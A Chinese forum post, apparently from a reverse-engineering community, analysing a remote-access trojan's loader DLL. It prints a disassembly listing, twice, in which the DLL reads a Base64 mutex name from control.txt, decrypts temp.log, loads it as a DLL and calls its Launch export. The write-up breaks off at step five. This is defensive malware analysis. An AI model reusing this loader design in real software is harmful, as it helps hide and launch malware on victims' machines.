-
-
[原创]记一次远控木马的分析
-
发表于: 2018-2-8 23:48
-
朋友电脑中毒,从他的电脑拷出来的...
环境: win7 x32
工具: OD IDA DLL Export Viewer LordPE
control.txt 放了一段疑似Base64加密后的文本
尝试揭秘后
解密前: N1hZMG9NTjhvVHwyMDk5MjA= 解密后: 7XY0oMN8oT|209920
temp.log里则是乱码 肯定是被加密了
解密前: N1hZMG9NTjhvVHwyMDk5MjA= 解密后: 7XY0oMN8oT|209920
temp.log里则是乱码 肯定是被加密了
help.exe 好像是vs的资源编辑器
rcdll.dll 加了UPX 这里用了esp定律直接脱掉
看下他的两个导出函数
100012E0 RCDLL.Handler $ C3 retn 100012E1 90 nop 100012E2 90 nop 100012E3 90 nop
100012E0 RCDLL.Handler $ C3 retn 100012E1 90 nop 100012E2 90 nop 100012E3 90 nop
100010C0 RCDLL.RC /$ 81EC 14030000 sub esp,0x314 100010C6 |. 53 push ebx 100010C7 |. 55 push ebp 100010C8 |. 56 push esi 100010C9 |. 57 push edi 100010CA |. 33DB xor ebx,ebx 100010CC |. B9 40000000 mov ecx,0x40 100010D1 |. 33C0 xor eax,eax 100010D3 |. 8D7C24 19 lea edi,dword ptr ss:[esp+0x19] 100010D7 |. 885C24 18 mov byte ptr ss:[esp+0x18],bl 100010DB |. 68 04010000 push 0x104 ; /BufSize = 104 (260.) 100010E0 |. F3:AB rep stos dword ptr es:[edi] ; | 100010E2 |. 66:AB stos word ptr es:[edi] ; | 100010E4 |. AA stos byte ptr es:[edi] ; | 100010E5 |. 8D4424 1C lea eax,dword ptr ss:[esp+0x1C] ; | 100010E9 |. 50 push eax ; |PathBuffer 100010EA |. 53 push ebx ; |hModule => NULL 100010EB |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA 100010F1 |. 8D4C24 18 lea ecx,dword ptr ss:[esp+0x18] 100010F5 |. 51 push ecx ; /Path 100010F6 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA 100010FC |. 8D5424 18 lea edx,dword ptr ss:[esp+0x18] 10001100 |. 68 48800010 push 10008048 ; /StringToAdd = "\control.txt" 10001105 |. 52 push edx ; |ConcatString 10001106 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA 1000110C |. 53 push ebx ; /hTemplateFile => NULL 1000110D |. 68 80000000 push 0x80 ; |Attributes = NORMAL 10001112 |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING 10001114 |. 53 push ebx ; |pSecurity => NULL 10001115 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 10001117 |. 8D4424 2C lea eax,dword ptr ss:[esp+0x2C] ; | 1000111B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ 10001120 |. 50 push eax ; |FileName 10001121 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA 10001127 |. 8BF8 mov edi,eax 10001129 |. 53 push ebx ; /pFileSizeHigh => NULL 1000112A |. 57 push edi ; |hFile 1000112B |. 895C24 18 mov dword ptr ss:[esp+0x18],ebx ; | 1000112F |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize 10001135 |. 8BE8 mov ebp,eax 10001137 |. 55 push ebp 10001138 |. E8 070A0000 call 10001B44 1000113D |. 83C4 04 add esp,0x4 10001140 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 10001144 |. 8BF0 mov esi,eax 10001146 |. 53 push ebx ; /pOverlapped 10001147 |. 51 push ecx ; |pBytesRead 10001148 |. 55 push ebp ; |BytesToRead 10001149 |. 56 push esi ; |Buffer 1000114A |. 57 push edi ; |hFile 1000114B |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile 10001151 |. 8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C] ; kernel32.CloseHandle 10001157 |. 57 push edi ; /hObject 10001158 |. FFD5 call ebp ; \CloseHandle 1000115A |. 56 push esi ; /MutexName 1000115B |. 53 push ebx ; |InitialOwner 1000115C |. 53 push ebx ; |pSecurity 1000115D |. FF15 18700010 call dword ptr ds:[0x10007018] ; \CreateMutexA 10001163 |. 8BF8 mov edi,eax 10001165 |. FF15 14700010 call dword ptr ds:[0x10007014] ; [GetLastError 1000116B |. 3D B7000000 cmp eax,0xB7 10001170 |. 75 0A jnz short 1000117C 10001172 |. 57 push edi ; /hObject 10001173 |. FFD5 call ebp ; \CloseHandle 10001175 |. 53 push ebx ; /ExitCode 10001176 |. FF15 10700010 call dword ptr ds:[0x10007010] ; \ExitProcess 1000117C |> B9 40000000 mov ecx,0x40 10001181 |. 33C0 xor eax,eax 10001183 |. 8DBC24 210200>lea edi,dword ptr ss:[esp+0x221] 1000118A |. 889C24 200200>mov byte ptr ss:[esp+0x220],bl 10001191 |. F3:AB rep stos dword ptr es:[edi] 10001193 |. 66:AB stos word ptr es:[edi] 10001195 |. AA stos byte ptr es:[edi] 10001196 |. 8B4424 10 mov eax,dword ptr ss:[esp+0x10] 1000119A |. 8D9424 200200>lea edx,dword ptr ss:[esp+0x220] 100011A1 |. 52 push edx 100011A2 |. 50 push eax 100011A3 |. 56 push esi 100011A4 |. E8 67010000 call 10001310 ; Base64 解密 100011A9 |. 8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C] 100011B0 |. 68 44800010 push 10008044 ; UNICODE "|" 100011B5 |. 51 push ecx 100011B6 |. E8 E5080000 call 10001AA0 100011BB |. 83C4 14 add esp,0x14 100011BE |. 50 push eax ; /String2 100011BF |. 68 00AB0010 push 1000AB00 ; |String1 = RCDLL.1000AB00 100011C4 |. FF15 0C700010 call dword ptr ds:[0x1000700C] ; \lstrcpyA 100011CA |. B9 40000000 mov ecx,0x40 100011CF |. 33C0 xor eax,eax 100011D1 |. 8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D] 100011D8 |. 889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl 100011DF |. F3:AB rep stos dword ptr es:[edi] 100011E1 |. 66:AB stos word ptr es:[edi] 100011E3 |. 8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C] 100011EA |. 68 04010000 push 0x104 ; /BufSize = 104 (260.) 100011EF |. 52 push edx ; |PathBuffer 100011F0 |. 53 push ebx ; |hModule 100011F1 |. AA stos byte ptr es:[edi] ; | 100011F2 |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA 100011F8 |. 8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C] 100011FF |. 50 push eax ; /Path 10001200 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA 10001206 |. 8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C] 1000120D |. 68 38800010 push 10008038 ; /StringToAdd = "\temp.log" 10001212 |. 51 push ecx ; |ConcatString 10001213 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA 10001219 |. 53 push ebx ; /hTemplateFile 1000121A |. 68 80000000 push 0x80 ; |Attributes = NORMAL 1000121F |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING 10001221 |. 53 push ebx ; |pSecurity 10001222 |. 6A 01 push 0x1 ; |ShareMode = FILE_SHARE_READ 10001224 |. 8D9424 300100>lea edx,dword ptr ss:[esp+0x130] ; | 1000122B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ 10001230 |. 52 push edx ; |FileName 10001231 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA 10001237 |. 8BF0 mov esi,eax 10001239 |. 53 push ebx ; /pFileSizeHigh 1000123A |. 56 push esi ; |hFile 1000123B |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize 10001241 |. 8BF8 mov edi,eax 10001243 |. 895C24 14 mov dword ptr ss:[esp+0x14],ebx 10001247 |. 57 push edi 10001248 |. E8 F7080000 call 10001B44 1000124D |. 83C4 04 add esp,0x4 10001250 |. 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] 10001254 |. A3 08AC0010 mov dword ptr ds:[0x1000AC08],eax 10001259 |. 53 push ebx ; /pOverlapped 1000125A |. 51 push ecx ; |pBytesRead 1000125B |. 57 push edi ; |BytesToRead 1000125C |. 50 push eax ; |Buffer 1000125D |. 56 push esi ; |hFile 1000125E |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile 10001264 |. 56 push esi 10001265 |. FFD5 call ebp 10001267 |. 8B5424 14 mov edx,dword ptr ss:[esp+0x14] 1000126B |. 52 push edx ; 文件大小 1000126C |. 68 08AC0010 push 1000AC08 ; 文件buf 10001271 |. E8 8AFDFFFF call 10001000 ; 解密call 10001276 |. A1 08AC0010 mov eax,dword ptr ds:[0x1000AC08] 1000127B |. 50 push eax 1000127C |. E8 2F020000 call 100014B0 ; 加载dll 10001281 |. 83C4 0C add esp,0xC 10001284 |. 3BC3 cmp eax,ebx 10001286 |. A3 F8AA0010 mov dword ptr ds:[0x1000AAF8],eax 1000128B |. 74 3D je short 100012CA 1000128D |. 68 30800010 push 10008030 ; ASCII "Launch" 10001292 |. 50 push eax 10001293 |. E8 C8060000 call 10001960 ; GetProcAddress 获取Launch函数地址 10001298 |. 83C4 08 add esp,0x8 1000129B |. 3BC3 cmp eax,ebx 1000129D |. 74 19 je short 100012B8 1000129F |. 68 30800010 push 10008030 ; ASCII "Launch" 100012A4 |. FFD0 call eax ; 调用Launch 100012A6 |. 8B35 08700010 mov esi,dword ptr ds:[0x10007008] ; kernel32.Sleep 100012AC |. 83C4 04 add esp,0x4 100012AF |> 68 A0860100 /push 0x186A0 100012B4 |. FFD6 |call esi 100012B6 |.^ EB F7 \jmp short 100012AF 100012B8 |> A1 F8AA0010 mov eax,dword ptr ds:[0x1000AAF8] 100012BD |. 3BC3 cmp eax,ebx 100012BF |. 74 09 je short 100012CA 100012C1 |. 50 push eax 100012C2 |. E8 E9010000 call 100014B0 100012C7 |. 83C4 04 add esp,0x4 100012CA |> 5F pop edi 100012CB |. 5E pop esi 100012CC |. 5D pop ebp 100012CD |. 5B pop ebx 100012CE |. 81C4 14030000 add esp,0x314 100012D4 \. C3 retn
直接定位关键点
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果创建失败,则结束进程
100010C0 RCDLL.RC /$ 81EC 14030000 sub esp,0x314 100010C6 |. 53 push ebx 100010C7 |. 55 push ebp 100010C8 |. 56 push esi 100010C9 |. 57 push edi 100010CA |. 33DB xor ebx,ebx 100010CC |. B9 40000000 mov ecx,0x40 100010D1 |. 33C0 xor eax,eax 100010D3 |. 8D7C24 19 lea edi,dword ptr ss:[esp+0x19] 100010D7 |. 885C24 18 mov byte ptr ss:[esp+0x18],bl 100010DB |. 68 04010000 push 0x104 ; /BufSize = 104 (260.) 100010E0 |. F3:AB rep stos dword ptr es:[edi] ; | 100010E2 |. 66:AB stos word ptr es:[edi] ; | 100010E4 |. AA stos byte ptr es:[edi] ; | 100010E5 |. 8D4424 1C lea eax,dword ptr ss:[esp+0x1C] ; | 100010E9 |. 50 push eax ; |PathBuffer 100010EA |. 53 push ebx ; |hModule => NULL 100010EB |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA 100010F1 |. 8D4C24 18 lea ecx,dword ptr ss:[esp+0x18] 100010F5 |. 51 push ecx ; /Path 100010F6 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA 100010FC |. 8D5424 18 lea edx,dword ptr ss:[esp+0x18] 10001100 |. 68 48800010 push 10008048 ; /StringToAdd = "\control.txt" 10001105 |. 52 push edx ; |ConcatString 10001106 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA 1000110C |. 53 push ebx ; /hTemplateFile => NULL 1000110D |. 68 80000000 push 0x80 ; |Attributes = NORMAL 10001112 |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING 10001114 |. 53 push ebx ; |pSecurity => NULL 10001115 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 10001117 |. 8D4424 2C lea eax,dword ptr ss:[esp+0x2C] ; | 1000111B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ 10001120 |. 50 push eax ; |FileName 10001121 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA 10001127 |. 8BF8 mov edi,eax 10001129 |. 53 push ebx ; /pFileSizeHigh => NULL 1000112A |. 57 push edi ; |hFile 1000112B |. 895C24 18 mov dword ptr ss:[esp+0x18],ebx ; | 1000112F |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize 10001135 |. 8BE8 mov ebp,eax 10001137 |. 55 push ebp 10001138 |. E8 070A0000 call 10001B44 1000113D |. 83C4 04 add esp,0x4 10001140 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 10001144 |. 8BF0 mov esi,eax 10001146 |. 53 push ebx ; /pOverlapped 10001147 |. 51 push ecx ; |pBytesRead 10001148 |. 55 push ebp ; |BytesToRead 10001149 |. 56 push esi ; |Buffer 1000114A |. 57 push edi ; |hFile 1000114B |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile 10001151 |. 8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C] ; kernel32.CloseHandle 10001157 |. 57 push edi ; /hObject 10001158 |. FFD5 call ebp ; \CloseHandle 1000115A |. 56 push esi ; /MutexName 1000115B |. 53 push ebx ; |InitialOwner 1000115C |. 53 push ebx ; |pSecurity 1000115D |. FF15 18700010 call dword ptr ds:[0x10007018] ; \CreateMutexA 10001163 |. 8BF8 mov edi,eax 10001165 |. FF15 14700010 call dword ptr ds:[0x10007014] ; [GetLastError 1000116B |. 3D B7000000 cmp eax,0xB7 10001170 |. 75 0A jnz short 1000117C 10001172 |. 57 push edi ; /hObject 10001173 |. FFD5 call ebp ; \CloseHandle 10001175 |. 53 push ebx ; /ExitCode 10001176 |. FF15 10700010 call dword ptr ds:[0x10007010] ; \ExitProcess 1000117C |> B9 40000000 mov ecx,0x40 10001181 |. 33C0 xor eax,eax 10001183 |. 8DBC24 210200>lea edi,dword ptr ss:[esp+0x221] 1000118A |. 889C24 200200>mov byte ptr ss:[esp+0x220],bl 10001191 |. F3:AB rep stos dword ptr es:[edi] 10001193 |. 66:AB stos word ptr es:[edi] 10001195 |. AA stos byte ptr es:[edi] 10001196 |. 8B4424 10 mov eax,dword ptr ss:[esp+0x10] 1000119A |. 8D9424 200200>lea edx,dword ptr ss:[esp+0x220] 100011A1 |. 52 push edx 100011A2 |. 50 push eax 100011A3 |. 56 push esi 100011A4 |. E8 67010000 call 10001310 ; Base64 解密 100011A9 |. 8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C] 100011B0 |. 68 44800010 push 10008044 ; UNICODE "|" 100011B5 |. 51 push ecx 100011B6 |. E8 E5080000 call 10001AA0 100011BB |. 83C4 14 add esp,0x14 100011BE |. 50 push eax ; /String2 100011BF |. 68 00AB0010 push 1000AB00 ; |String1 = RCDLL.1000AB00 100011C4 |. FF15 0C700010 call dword ptr ds:[0x1000700C] ; \lstrcpyA 100011CA |. B9 40000000 mov ecx,0x40 100011CF |. 33C0 xor eax,eax 100011D1 |. 8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D] 100011D8 |. 889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl 100011DF |. F3:AB rep stos dword ptr es:[edi] 100011E1 |. 66:AB stos word ptr es:[edi] 100011E3 |. 8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C] 100011EA |. 68 04010000 push 0x104 ; /BufSize = 104 (260.) 100011EF |. 52 push edx ; |PathBuffer 100011F0 |. 53 push ebx ; |hModule 100011F1 |. AA stos byte ptr es:[edi] ; | 100011F2 |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA 100011F8 |. 8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C] 100011FF |. 50 push eax ; /Path 10001200 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA 10001206 |. 8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C] 1000120D |. 68 38800010 push 10008038 ; /StringToAdd = "\temp.log" 10001212 |. 51 push ecx ; |ConcatString 10001213 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA 10001219 |. 53 push ebx ; /hTemplateFile 1000121A |. 68 80000000 push 0x80 ; |Attributes = NORMAL 1000121F |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING 10001221 |. 53 push ebx ; |pSecurity 10001222 |. 6A 01 push 0x1 ; |ShareMode = FILE_SHARE_READ 10001224 |. 8D9424 300100>lea edx,dword ptr ss:[esp+0x130] ; | 1000122B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ 10001230 |. 52 push edx ; |FileName 10001231 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA 10001237 |. 8BF0 mov esi,eax 10001239 |. 53 push ebx ; /pFileSizeHigh 1000123A |. 56 push esi ; |hFile 1000123B |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize 10001241 |. 8BF8 mov edi,eax 10001243 |. 895C24 14 mov dword ptr ss:[esp+0x14],ebx 10001247 |. 57 push edi 10001248 |. E8 F7080000 call 10001B44 1000124D |. 83C4 04 add esp,0x4 10001250 |. 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] 10001254 |. A3 08AC0010 mov dword ptr ds:[0x1000AC08],eax 10001259 |. 53 push ebx ; /pOverlapped 1000125A |. 51 push ecx ; |pBytesRead 1000125B |. 57 push edi ; |BytesToRead 1000125C |. 50 push eax ; |Buffer 1000125D |. 56 push esi ; |hFile 1000125E |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile 10001264 |. 56 push esi 10001265 |. FFD5 call ebp 10001267 |. 8B5424 14 mov edx,dword ptr ss:[esp+0x14] 1000126B |. 52 push edx ; 文件大小 1000126C |. 68 08AC0010 push 1000AC08 ; 文件buf 10001271 |. E8 8AFDFFFF call 10001000 ; 解密call 10001276 |. A1 08AC0010 mov eax,dword ptr ds:[0x1000AC08] 1000127B |. 50 push eax 1000127C |. E8 2F020000 call 100014B0 ; 加载dll 10001281 |. 83C4 0C add esp,0xC 10001284 |. 3BC3 cmp eax,ebx 10001286 |. A3 F8AA0010 mov dword ptr ds:[0x1000AAF8],eax 1000128B |. 74 3D je short 100012CA 1000128D |. 68 30800010 push 10008030 ; ASCII "Launch" 10001292 |. 50 push eax 10001293 |. E8 C8060000 call 10001960 ; GetProcAddress 获取Launch函数地址 10001298 |. 83C4 08 add esp,0x8 1000129B |. 3BC3 cmp eax,ebx 1000129D |. 74 19 je short 100012B8 1000129F |. 68 30800010 push 10008030 ; ASCII "Launch" 100012A4 |. FFD0 call eax ; 调用Launch 100012A6 |. 8B35 08700010 mov esi,dword ptr ds:[0x10007008] ; kernel32.Sleep 100012AC |. 83C4 04 add esp,0x4 100012AF |> 68 A0860100 /push 0x186A0 100012B4 |. FFD6 |call esi 100012B6 |.^ EB F7 \jmp short 100012AF 100012B8 |> A1 F8AA0010 mov eax,dword ptr ds:[0x1000AAF8] 100012BD |. 3BC3 cmp eax,ebx 100012BF |. 74 09 je short 100012CA 100012C1 |. 50 push eax 100012C2 |. E8 E9010000 call 100014B0 100012C7 |. 83C4 04 add esp,0x4 100012CA |> 5F pop edi 100012CB |. 5E pop esi 100012CC |. 5D pop ebp 100012CD |. 5B pop ebx 100012CE |. 81C4 14030000 add esp,0x314 100012D4 \. C3 retn
直接定位关键点
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果创建失败,则结束进程
(3) 将
N1hZMG9NTjhvVHwyMDk5MjA= 进行解密 解密的结果与刚开始猜测的一样
(4) 把解密后内容 7XY0oMN8oT|209920 以 " | " 进行分割 并将 7XY0oMN8oT 用 lstrcoyA 到 0x1000AB00
(5) 读入当前目录 temp.log 并进行解密
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
